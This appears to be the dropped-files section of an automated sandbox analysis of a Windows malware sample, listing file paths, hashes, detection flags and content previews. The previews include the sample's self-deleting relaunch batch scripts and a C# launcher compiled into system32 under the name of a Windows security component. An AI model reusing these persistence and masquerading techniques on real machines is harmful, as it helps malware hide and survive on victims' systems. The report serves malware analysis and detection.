C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\bridgenet.exe.bin.exe.log

Download File

Process:	C:\Users\user\Desktop\bridgenet.exe.bin.exe
File Type:	CSV text
Category:	modified
Size (bytes):	1306
Entropy (8bit):	5.353303787007226
Encrypted:	false
SSDEEP:	24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUN+E4KlOU4mZsXE4Npv:MxHKQwYHKGSI6oPtHTHhAHKKk+HKlT4T
MD5:	BD55EA7BCC4484ED7DE5C6F56A64EF15
SHA1:	76CBF3B5E5A83EC67C4381F697309877F0B20BBE
SHA-256:	81E0A3669878ED3FFF8E565607FB86C5478D7970583E7010D191A8BC4E5066B6
SHA-512:	B50A3F8F5D18D3F1C85A6A5C9A46258B1D6930B75C847F0FB6E0A7CD0627E4690125BB3171A2D6554DEBE240ADAB2FF23ABDECA9959357B48089CFBF1F0D9FD8
Malicious:	true
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\Syste

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\dwm.exe.log

Download File

Process:	C:\Program Files\Internet Explorer\images\dwm.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	847
Entropy (8bit):	5.354334472896228
Encrypted:	false
SSDEEP:	24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
MD5:	9F9FA9EFE67E9BBD165432FA39813EEA
SHA1:	6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
SHA-256:	4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
SHA-512:	F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe.log

Download File

Process:	C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	1523
Entropy (8bit):	5.373534083924954
Encrypted:	false
SSDEEP:	24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUN+E4KlOU4mC1qE4GIs0E4KD:MxHKQwYHKGSI6oPtHTHhAHKKk+HKlT41
MD5:	5E675003E8A6113031BC81EC692CFE0A
SHA1:	53FAFEED5B3E6489BDD729B50C948DD00A7CBC83
SHA-256:	5A74192EB3D5A96FA18278AD0D7B9B4D791830D7F2ED7C70B3746B0A635DF24F
SHA-512:	4F22E0ED4CF9ED3CA13DF90EC96DE2257128EFD5B67579DC822386D6233836F1EA3E11DAEB1DB36227CB5B2C595F8C296A2EB0706D356B6C86EA98A4FCC018D7
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\Syste

C:\Users\user\AppData\Local\Temp\5z3arsde\5z3arsde.0.cs

Download File

Process:	C:\Users\user\Desktop\bridgenet.exe.bin.exe
File Type:	C++ source, Unicode text, UTF-8 (with BOM) text
Category:	dropped
Size (bytes):	420
Entropy (8bit):	5.040798367575614
Encrypted:	false
SSDEEP:	12:V/DNVgtDIbSf+eBLZ7bfiFkMSf+eBL6L/2nBLiFkD:JNVQIbSfhV7TiFkMSfhWLnFkD
MD5:	8889428D117E6372FA160D914106268D
SHA1:	4BF5345CCDC15668190CCAF785EFE1B5B7953B02
SHA-256:	03B834BE875DE9A0DF177D3D85FEFA59B1A94CB24A1ADD433EC09A1E5CCE658B
SHA-512:	A41AAD71A3A1B807B4909E0A816345BD56BBE85D4DF1B550E7600595D36D960D11321BC630B9000203EE140EE0A68326FCE9026B43C7926413D9713F0B1E0BD7
Malicious:	false
Preview:	.using System.Diagnostics;.using System.Threading;..class Program.{. static void Main(string[] args). {. new Thread(() => { try { Process.Start(@"C:\Windows\system32\SecurityHealthSystray.exe.exe", string.Join(" ", args)); } catch { } }).Start();. new Thread(() => { try { Process.Start(@"C:\Program Files (x86)\jdownloader\config\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe"); } catch { } }).Start();. }.}.

C:\Users\user\AppData\Local\Temp\5z3arsde\5z3arsde.cmdline

Download File

Process:	C:\Users\user\Desktop\bridgenet.exe.bin.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:	dropped
Size (bytes):	249
Entropy (8bit):	5.037552365612389
Encrypted:	false
SSDEEP:	6:Hu+H2L//1xRT0T79BzxsjGZxWE8oqLTwi23fHeKiVA:Hu7L//TRq79cQawZmKL
MD5:	C362BB98365A3AAB38854EAF90438DA8
SHA1:	9A56291D3F916C28B9384771FE3D1C2208FD3E35
SHA-256:	DB20ADEC1922DBBF349785399C20C5C61AB5968AD628D2A5E6F6B6190C73E681
SHA-512:	228A8DA7A05ABBC1F8C5C2E286F441AC3D40010D6EBE365116E1D86BE9A0E73E62C2379A989F3ACE37C547286AEBD7FAB12FF6F0A551ED2CADC2963995100EDE
Malicious:	false
Preview:	./t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\5z3arsde\5z3arsde.0.cs"

C:\Users\user\AppData\Local\Temp\5z3arsde\5z3arsde.out

Download File

Process:	C:\Users\user\Desktop\bridgenet.exe.bin.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with very long lines (327), with CRLF, CR line terminators
Category:	modified
Size (bytes):	748
Entropy (8bit):	5.239672992894943
Encrypted:	false
SSDEEP:	12:Km/I/u7L//TRq79cQawZmKKKaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:K8I/un/Vq79tawZm7Kax5DqBVKVrdFAw
MD5:	B4733F94F3E61A00EC5BD9E4BFE29686
SHA1:	8DE81C393938D4F5FF633E42BF6A991B7973D027
SHA-256:	B7E2B42E1DDF7E9417132E0ECEAF3E4D15DB87EA59CC5B5DD8717B1385388A7E
SHA-512:	FAA8D9E721DE11D60815393868C0B8506A6D34F9DA8D693912360FEA6B34C2A128550B9E5C3FF6E2A85E2BA32747B36E84A447D517889CA0D10F8E2033ED2F2D
Malicious:	false
Preview:	.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\5z3arsde\5z3arsde.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

C:\Users\user\AppData\Local\Temp\62xZ8bmi7l.bat

Download File

Process:	C:\Users\user\Desktop\bridgenet.exe.bin.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	184
Entropy (8bit):	5.305396400100929
Encrypted:	false
SSDEEP:	3:mKDDVNGvTVLuVFcROr+jn9mVqGNUNX2hBTLNHyBktKcKZG1qLTVSRE2J5xAITd0w:hCRLuVFOOr+DEzSNGhBHNSKOZG1qLTwD
MD5:	6CC697788ECF888482F976A4B95F03BE
SHA1:	26EDC097BC99A048E1BD1D406A525D955ABBBE56
SHA-256:	7BEE1E30C4C58010DD6C05187E4CC424EB0E5C82232296E7015563C6B7FA6C74
SHA-512:	C1509DF162E6F77A3D5176B19AD62DD82969EFA906534FCE3029F336C6CAC11689D18941198343CB45CC6579217A4CA1841E2BCA3A8F102C86C66E9062A24032
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\62xZ8bmi7l.bat"

C:\Users\user\AppData\Local\Temp\75OpyD0wFt.bat

Download File

Process:	C:\Program Files\Internet Explorer\images\dwm.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	176
Entropy (8bit):	5.117250290116348
Encrypted:	false
SSDEEP:	3:mKDDVNGvTVLuVFcROr+jn9mbZj4bAs1iIECA+BVSBktKcKZG1qLTVSRE2J5xAIIC:hCRLuVFOOr+DEqbb1i5CA+6KOZG1qLTE
MD5:	DED59F3626219990C6E7DBE019BE3EA2
SHA1:	20CD6B51A35870E7CA04391D69C04BDFE7D0FA48
SHA-256:	1E3AD44378000A6686B389B6ECAE0B0B5BEEC4362BBBA84EC04142D278055089
SHA-512:	EF2D4D40F01F5345B25A903E1CEBB87735C8B28F291833D3F5A514E05365B5F8F2375AD28147A2157059D6A9459E107686CD650A1BDB78CEB15E8664BF41CF9C
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Program Files\Internet Explorer\images\dwm.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\75OpyD0wFt.bat"

C:\Users\user\AppData\Local\Temp\AS6CsXUnv5

Download File

Process:	C:\Users\user\Desktop\bridgenet.exe.bin.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	4.403856189774723
Encrypted:	false
SSDEEP:	3:gbi0/HxKM3:gFxKM3
MD5:	8E305F7DF193EAE3B5E88CD89A4FC1D7
SHA1:	C11BC56E8E85CD5F957C08E28F2C5B367E7F8A34
SHA-256:	0EE6495F3BA19BD01419BB977CA5ABF20EB75869BC8BF7ABFBEF45D971587E88
SHA-512:	03B34944DD336E5764EE546A89C7D6940CCA48FAE63CB2F6D2668D071975FE454784A5A5858024B817F65F6CEB78D54A04873AA3C59ACCFF936605D9981DE734
Malicious:	false
Preview:	0hrVyR262Yil3CfZbb4D9snBR

C:\Users\user\AppData\Local\Temp\B8RGJU8TMM.bat

Download File

Process:	C:\Program Files\Internet Explorer\images\dwm.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	224
Entropy (8bit):	5.1488289091507
Encrypted:	false
SSDEEP:	6:hCijTg3Nou1SV+DEqbb1i5CA+6KOZG1qLTwi23fEWKn:HTg9uYDEcis0wZsVn
MD5:	8C42165D8F51A5E1F61C889AE9981720
SHA1:	545B326BE10F0D6AE84A2147C0BE99E113C82106
SHA-256:	68667F98EBF43792F155D24E30A4210E995C69576B52D758A56EC27D144F817C
SHA-512:	5AEAC73E36F72CC4024B85E778CE5BC1266AE827F52CD324390560F846A877691D481C64D549816ABB82C9C5964A6CCF422B946ED8CBCE5DBCC34ABC514829DD
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Program Files\Internet Explorer\images\dwm.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\B8RGJU8TMM.bat"

C:\Users\user\AppData\Local\Temp\FnlL3aVnrp.bat

Download File

Process:	C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	184
Entropy (8bit):	5.249374464182824
Encrypted:	false
SSDEEP:	3:mKDDVNGvTVLuVFcROr+jn9mVqGNUNX2hBTLNHyBktKcKZG1qLTVSRE2J5xAIlDXU:hCRLuVFOOr+DEzSNGhBHNSKOZG1qLTwA
MD5:	0C17D4D8B92FFAF4DF220E4D6F112BDC
SHA1:	5E3AD4F7BC7B05ED0EE2A1A4DD467AF38A38ECC1
SHA-256:	2198C09DE0B6F36C0CD268EA08EE7C0C0326CCEAA95F8129771B2E33C1FA00BF
SHA-512:	4C22282D658BDFD0CD63ED3616E67708C582087B2BCBCD78E9671E9DFF78A8840E04747F4BBE120BC7C9D12778F20465B0354A01BECC7D9D4C8C2431095DA99C
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\FnlL3aVnrp.bat"

C:\Users\user\AppData\Local\Temp\RESDB99.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
File Type:	Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x6cc, 10 symbols, created Mon Jan 13 13:43:45 2025, 1st section name ".debug$S"
Category:	dropped
Size (bytes):	1924
Entropy (8bit):	4.610483357144418
Encrypted:	false
SSDEEP:	48:BLzgGJEwZ6KTRmslmuulB+hnqXSfbNtmhn:BngGJE3KTks2TkZzNtyn
MD5:	12B004E407F4D8B4B6171FB72361C2E5
SHA1:	8B5A25773BB5C744F210D06DDA1C0C43D0BED0CD
SHA-256:	DF2DA91D8695C3A2CC58E2816C8E2F757D4FF1C0C3BE7D2FF7B762483E63575A
SHA-512:	8DF00AED6ABB15934190F08728B6A63D333EEABF567DD4A9A8CA683B81B440C096CF31E20484326BF3C3A40EA5BC8BFD0BFDC222BE8B0ECB0FE7680B1173C63C
Malicious:	false
Preview:	L......g.............debug$S........T...................@..B.rsrc$01............................@..@.rsrc$02........8...................@..@........[....c:\Program Files (x86)\Microsoft\Edge\Application\CSCF6FBA02FA6D54D1FBEF275314C5F713F.TMP....................q.QK.......N..........3.......C:\Users\user\AppData\Local\Temp\RESDB99.tmp.-.<....................a..Microsoft (R) CVTRES.].=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe....................... .......8.......................P.......................h.......................................................D...............................................D.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...8.....I.n.t.e.r.n.a.l.N.a.m.

C:\Users\user\AppData\Local\Temp\RESDE49.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
File Type:	Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x6e8, 10 symbols, created Mon Jan 13 13:43:46 2025, 1st section name ".debug$S"
Category:	dropped
Size (bytes):	1952
Entropy (8bit):	4.550937036215049
Encrypted:	false
SSDEEP:	48:tXSsz3EwZOKTRmEluOulajfqXSfbNtmh5Z:t7rEbKTkE+cjRzNtyH
MD5:	3EDC4AF47408FE3E1BE66FA92EEF07F0
SHA1:	525A3AC3419100C0A9C64E42BE5C361342E1C804
SHA-256:	21DB4A1C6E04357843574E249E8C1993847F0279BE95D81F4A26A422B58A8F94
SHA-512:	5747B697232214CC9A4BB6DD7470CCAD05D40E22C5F530032C6BD04D384966D77A720559A0E7FF2878FD3B38C150657EE3E790A35DD28CCB70373959BD2B66A1
Malicious:	false
Preview:	L......g.............debug$S........8...................@..B.rsrc$01................d...........@..@.rsrc$02........p...x...............@..@........=....c:\Windows\System32\CSCEE8385358E3E4E5C92A1AE5417196AA8.TMP.....................r.av..t.y..............3.......C:\Users\user\AppData\Local\Temp\RESDE49.tmp.-.<....................a..Microsoft (R) CVTRES.].=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe....................... .......8.......................P.......................h.......................................................\|...............................................\|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.

C:\Users\user\AppData\Local\Temp\THHDNvv6pM

Download File

Process:	C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	4.403856189774723
Encrypted:	false
SSDEEP:	3:BXiyAP7wq:hyMq
MD5:	6FBC2AAE00BB99A6D25353612B453F0E
SHA1:	08D4BB9B7C7BC16A6255D46726C23CC9C966D2BF
SHA-256:	21E859234B944BB67C3916E63DC653067B6EEA9276CEB626236107445D75D317
SHA-512:	A5EBCE790D68C898A6EC117592FA2C43F305E1F4AE7F42906E3D69942395B511DC3BC2248F9A6B3BCE6708E32CFB0FD5671CD985204E2277A52BBD1457C1E693
Malicious:	false
Preview:	AmrR5BvJNGLj3288s1ygNMHZG

C:\Users\user\AppData\Local\Temp\Ye8GjO9RaC.bat

Download File

Process:	C:\Users\user\Desktop\bridgenet.exe.bin.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	170
Entropy (8bit):	5.108189013804692
Encrypted:	false
SSDEEP:	3:mKDDVNGvTVLuVFcROr+jn9m1qLEH3ALRALs/ABvBktKcKZG1qLTVSRE2J5xAIdi2:hCRLuVFOOr+DE1qLEXALRx/CvKOZG1qm
MD5:	CDF71309F022E307BCA173B5A35F06E8
SHA1:	FDEF3B4496D34AD6E9B47E89697E604D00695A4A
SHA-256:	7BCC61990DF24975AA523A4121DA368057A95F3A3576332C6EF8FB66C493CBB6
SHA-512:	F7E48F9243125B51D08354204702F032F803BD7621C548E8B648E902E729CEBF204084096C296124E4029FCA927A8CA14C39FD938EAC104679E99AD24A342F9C
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Users\user\Desktop\bridgenet.exe.bin.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\Ye8GjO9RaC.bat"

C:\Users\user\AppData\Local\Temp\aXt99PhkzU

Download File

Process:	C:\Program Files\Internet Explorer\images\dwm.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	4.213660689688185
Encrypted:	false
SSDEEP:	3:mjsn+nN:mX
MD5:	A5B713C344141CF0704E10646743F797
SHA1:	38ECADD93223559D1D170F615F5308AC1CE84382
SHA-256:	B93EBA59067FD37E4994E1B3BD1F8D31776981B81305AC9A8B2909DDADCD0AA7
SHA-512:	A98FD2D5B769F61806532B63C5AEB563574BFF1639A9092EA75598FD14A9AE1BDE17A89B9CAF5155E53AF5718FC710856E2CE57E65E4B59AD8425422583FEA2E
Malicious:	false
Preview:	C4FIyd7dvvuD3QdHEMhJZCpL3

C:\Users\user\AppData\Local\Temp\c1T6jOg4B1

Download File

Process:	C:\Users\user\Desktop\bridgenet.exe.bin.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	4.293660689688184
Encrypted:	false
SSDEEP:	3:9qJpvcSVUka:9WpEHh
MD5:	90CC3A804F2D2AA2322B9C42D240A663
SHA1:	54F9B618BE582113D2CCA30821C9F39E2C09121C
SHA-256:	78FC799904D51A1C50D63BB94F6169634CEA45316B27A51B8357D286BA929D76
SHA-512:	E11DEB5A0E0F0A48766B836DCBE708E375F2F7AE78D90BB60FC3204D7DD72B5C000A69DEF46B1879593AC611444C2B960EE0A270A89EE11A8D5A59AB755E8CD5
Malicious:	false
Preview:	5YtPfSvFnQaQuJ9heBpEtQxAv

C:\Users\user\AppData\Local\Temp\eVVxxTaMab

Download File

Process:	C:\Program Files\Internet Explorer\images\dwm.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	4.403856189774723
Encrypted:	false
SSDEEP:	3:GVFLrP:GHLL
MD5:	9F5E9770927D1BB52F6A9A2F56324044
SHA1:	2225B624975BD4CB518211E4686C7C5DAE360215
SHA-256:	D84D069241AC9C7B4BED2C54AB466BBA2691875371256CBAF871BDD1FC1D7C78
SHA-512:	438A5A2CC4D49C83CC64F6622B2C37600EFCB47D99C6231D0671FA83327208AEBC0B6681DC6400D96F778DCCCA286CF3D52128BE835D0BED3185BDF83714F3C7
Malicious:	false
Preview:	4nQwYHnPACxk7jh81wygvF1KZ

C:\Users\user\AppData\Local\Temp\fDDEz4CMJh.bat

Download File

Process:	C:\Users\user\Desktop\bridgenet.exe.bin.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	218
Entropy (8bit):	5.100714454282754
Encrypted:	false
SSDEEP:	6:hCijTg3Nou1SV+DE1qLEXALRx/CvKOZG1qLTwi23fvd:HTg9uYDERWx/CdwZnd
MD5:	98A149F37B0AB5F8F5D95D310AFB151C
SHA1:	5FF813578D3384C4F7233CA4E6E3746560A9A92C
SHA-256:	4C1A7E7ECCE31ABED4000957020D6E7041B2342A472D8BE3FE5C4EAB871B766A
SHA-512:	CBA426C87B7CE23081FE295318CB948DD59822D035D7813938BF536275934DC575471FDAE3212E159B8B0A1B59AB52D84C6765FC663A42F8B73F3603C92BF1F5
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Users\user\Desktop\bridgenet.exe.bin.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\fDDEz4CMJh.bat"

C:\Users\user\AppData\Local\Temp\hfLcw1LImu

Download File

Process:	C:\Users\user\Desktop\bridgenet.exe.bin.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	4.243856189774723
Encrypted:	false
SSDEEP:	3:y1XQ1CTcUgq:yZQmcUgq
MD5:	D9F3FA6223F539965E5F1B555F77D2B5
SHA1:	A7F29F2ADB4165CE64CA69EEEA9705CDEF9451C4
SHA-256:	01F950A948F20C674118A92752EB33D3489C26FA6E9E5FFE3EE6BB5D33ABBD26
SHA-512:	03C5AD2FF4CE562898F74603DD84724E765B0A1960AB763FE327C11812B3A6E51D7C0E279E2B0D7B9AFDD052C38AD1C038F8D1299C214B7325806802D2B42AC3
Malicious:	false
Preview:	BuBPHaUOgkh0pHUv9qnwvLwld

C:\Users\user\AppData\Local\Temp\jGtvbkA8vZ

Download File

Process:	C:\Users\user\Desktop\bridgenet.exe.bin.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	4.133660689688186
Encrypted:	false
SSDEEP:	3:C2CIB/p0pU:9kU
MD5:	9F3DCC4828AF3B4B444F40162348ADEA
SHA1:	CBC0CCDD069C95D303B4BDB4B7DE3281EC5E9E23
SHA-256:	6E90C9F188A879A660C59D0818F06D5F7E020D2A318CC8AB87023C292C9DB761
SHA-512:	4A5FCC563008FE37B42E3FC164CCB370388CE9EF8C2EEE898B0A7C1E9F115B46E9436BE2CF90D7F5C3B0236E83714B5E763FF5BA32E59E53017EBEC39F85D973
Malicious:	false
Preview:	nN9EFtkCdc0qtdasLdLork7n1

C:\Users\user\AppData\Local\Temp\lQjAOk5IUW.bat

Download File

Process:	C:\Users\user\Desktop\bridgenet.exe.bin.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	170
Entropy (8bit):	5.107459529882239
Encrypted:	false
SSDEEP:	3:mKDDVNGvTVLuVFcROr+jn9m1qLEH3ALRALs/ABvBktKcKZG1qLTVSRE2J5xAISDr:hCRLuVFOOr+DE1qLEXALRx/CvKOZG1qn
MD5:	54A83E5C1DB96E34597ADB8BC59CE05E
SHA1:	1E4F2494A407288CA7C59B4C8659BF5050350C0E
SHA-256:	195394A7BDA76574DE72953DA4174EEB2F6F0A663C1EFEABE9D44FD196E80798
SHA-512:	008E521CC549914DA93C391C80EC09D302EFBBB79148A700189C215B20C66E337DADCB1B8E04C2876E977CA4D38A6D753DD67F900CA055A0125504AA008B5693
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Users\user\Desktop\bridgenet.exe.bin.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\lQjAOk5IUW.bat"

C:\Users\user\AppData\Local\Temp\nNfCPgCpuN

Download File

Process:	C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	4.323856189774723
Encrypted:	false
SSDEEP:	3:Lis6t4:P
MD5:	44255BC48406D881A92135C93556B0FD
SHA1:	5BA8E0C94D4248E34FAD4FEEA09FBA47CDB62743
SHA-256:	5F460730E5F12D5A176D7579040B503D3B079DDF128193F205F20147741CC183
SHA-512:	32970F49E70A7ACF55FB6F29A7FF1970B5A9973D3F7C28AB55F9128E2BD667D1120A4700D2517F6DEF36C2DB5CD838BB3141DB862FD8758DC1030B05443100FF
Malicious:	false
Preview:	iXmcP3FXejo5BTIEZ3FA2Vk7k

C:\Users\user\AppData\Local\Temp\xDZppRkgYb.bat

Download File

Process:	C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	232
Entropy (8bit):	5.259486746105945
Encrypted:	false
SSDEEP:	6:hCijTg3Nou1SV+DEzSNGhBHNSKOZG1qLTwi23fkq:HTg9uYDEzSN+B6wZ8q
MD5:	D01CAA4B9B5FF4251A94DAD485797ABE
SHA1:	A4DE3326F872392A4F909B166DA3A2FFE5B4066F
SHA-256:	F108E11FA3F73C3113F08901CAAE8E754C5E7E860701726AFEE784E8990F77FA
SHA-512:	2C0E30AEEE99EA324668F9B4282262EB98C69EC2E7E65ED29DE5E4F4037371FB8A71D559CE78286FB5B06BBF9C1FBBC9BB673EACF6E0E760D6C1869F6BCF9598
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
